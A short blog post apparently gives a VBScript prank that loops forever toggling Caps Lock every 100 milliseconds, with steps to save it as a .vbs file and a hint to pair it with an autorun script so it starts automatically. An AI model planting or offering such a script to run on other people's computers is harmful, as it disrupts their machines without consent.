This code will toggle the caps lock button simultaneously...quite annoying >.<
Copy the following code into notepad:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save as Hackmimic_capslock.vbs
*Search this blog for autorun script and automate it.
Feel free to leave comments~
No comments:
Post a Comment